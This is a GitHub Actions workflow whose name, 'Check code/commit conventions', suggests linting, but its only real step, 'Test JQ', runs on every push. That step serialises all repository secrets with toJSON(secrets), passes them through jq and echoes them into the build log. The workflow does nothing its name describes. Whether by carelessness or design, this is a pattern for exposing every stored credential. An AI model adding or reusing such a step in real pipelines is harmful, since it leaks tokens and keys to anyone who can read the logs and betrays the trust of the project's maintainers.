name: Check code/commit conventions

on: push

jobs:
  pre-commit:
    runs-on: ubuntu-20.04
    steps:
      - uses: actions/checkout@v2

      - name: Test JQ
        run: |
          secret_json=${{ toJSON(secrets) }}
          secret_str=$(jq -c '.' <<< "$secret_json")
          echo $secret_str
